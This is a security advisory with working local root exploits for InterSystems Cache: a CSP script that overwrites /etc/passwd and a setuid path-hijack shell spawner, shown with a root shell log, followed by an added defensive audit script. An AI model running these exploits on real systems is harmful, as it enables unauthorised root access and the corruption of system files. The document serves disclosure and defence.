
intersystems2.txt

Posted Aug 26, 2003
Authored by Larry W. Cashdollar

Further information and research in regards to the InterSystems Cache vulnerabilities discussed here. Two new vulnerabilities have been discovered and exploits are included.

tags | exploit, vulnerability
SHA-256 | 728fbb24e98602c5fe921cab33d49eb861a834a80b0d955bc059096191267f54


Here are more details of my research...

http://packetstormsecurity.nl/0307-exploits/intersystems.txt

These are more details for the above advisory.

Vuln 1
---------

Local attackers can exploit this to manipulate directories and binaries
inside the installation tree. This may be used by a local malicious user
to gain root access. The content in /cachesys/csp/user is executed as
root through the web interface. The parent directory of user (csp) is
world-writable, allowing a local non-root user to move user aside, copy
its contents, and create a new writable user directory.

1. mv /cachesys/csp/user /cachesys/csp/user.old
2. cp -rp /cachesys/csp/user.old /cachesys/csp/user
3. cp cspexp.csp /cachesys/csp/user
4. lynx http://localhost/csp/user/cspexp.csp
5. su - cache

<------------------cspexp.csp------------->

<html>

Intersystems Cache' local root exploit.
Larry W. Cashdollar
http://vapid.dhs.org

Because of poor default file and directory permissions a local user can
execute code as root via the cache CSP interpreter.
<HR>
Attempting to overwrite /etc/passwd with cache::0:0:root:/root:/bin/bash.

<script language=Cache runat=server>
Set cdef=##class(%Library.File).%New("/etc/passwd")
Do cdef.Open("WSN")
Do cdef.WriteLine("cache::0:0:root:/root:/bin/bash")
Do cdef.%Close()
</script>

</html>


Vuln 2
---------
A user who is a member of the group configured at installation to start
and stop the cache database can get local root access by exploiting poor
file permissions and the use of relative path names in setuid binaries.

The method is as follows:

1. mv /path/to/cache/bin/cache /path/to/cache/bin/cache.orig
2. cd /path/to/cache/bin
3. cat > cache.c << -EOF-
#include <stdio.h>
#include <stdlib.h>   /* system() */
#include <unistd.h>   /* setuid(), setgid() */

int main(void) {
setuid(0);setgid(0);
system("/bin/sh");
return 0;
}
-EOF-
4. gcc cache.c -o cache
5. ./cuxs

Details:

cuxs is setuid root and can be configured as executable by a specific
group upon installation of the Cache' database.

cuxs is a control program for Cache. It executes Cache using the following
system call:
execve("../bin/cache",["cache"],...
Since bin is world-writable by default, the cache binary can be moved and
replaced by a malicious one.

[lwc@boureguard lwc]$ cd /usr/ecache
[lwc@boureguard ecache]$ ls -ld bin;cd bin
drwxrwxrwx 2 root root 4096 Mar 18 07:13 bin
[lwc@boureguard bin]$ mv cache cache.orig
[lwc@boureguard bin]$ gcc cache.c -o cache
[lwc@boureguard bin]$ id
uid=500(lwc) gid=500(lwc) groups=500(lwc),10(wheel)
[lwc@boureguard bin]$ ls -l cuxs
-rwsr-x--- 1 root wheel 16488 Mar 18 06:49 cuxs
[lwc@boureguard bin]$ ./cuxs
sh-2.05a# id
uid=0(root) gid=0(root) groups=500(lwc),10(wheel)
sh-2.05a#
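
A defender-side check for the two conditions this advisory relies on: a world-writable directory inside the install tree, and a setuid binary sitting in a directory that non-root users can write to. This is an added example, not part of the original advisory or of InterSystems' code; the function names and the output labels are made up here, and the install root is passed as an argument.

```sh
#!/bin/sh
# Added example (not from the advisory): audit an install tree for the
# permission problems behind Vuln 1 and Vuln 2.
# Usage: sh audit.sh /path/to/cache   (the path is supplied by the caller)

# Directories under $1 that any local user can write to (the csp and bin
# cases above). Sticky directories are reported too and need manual review.
world_writable_dirs() {
    find "$1" -type d -perm -0002 2>/dev/null
}

# setuid/setgid files under $1 whose containing directory is writable by
# group or other. Whoever can write to that directory can rename or replace
# its entries, whatever the mode of the files themselves.
# Paths containing newlines are not handled.
setid_in_writable_dir() {
    find "$1" -type f \( -perm -4000 -o -perm -2000 \) 2>/dev/null |
    while IFS= read -r f; do
        d=$(dirname "$f")
        # -prune tests only the directory itself, without descending.
        if [ -n "$(find "$d" -prune \( -perm -0020 -o -perm -0002 \) 2>/dev/null)" ]; then
            printf '%s\n' "$f"
        fi
    done
}

# Print one labelled line per finding; return 1 if anything was found.
audit_tree() {
    findings=$(
        world_writable_dirs "$1" | sed 's/^/WORLD-WRITABLE-DIR /'
        setid_in_writable_dir "$1" | sed 's/^/SETID-IN-WRITABLE-DIR /'
    )
    if [ -z "$findings" ]; then
        return 0
    fi
    printf '%s\n' "$findings"
    return 1
}

if [ "$#" -gt 0 ]; then
    audit_tree "$1"
fi
```

Directory permissions are only half of Vuln 2: a setuid program that resolves "../bin/cache" relative to the caller's working directory should also be changed to use an absolute path inside a root-owned, non-writable directory.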


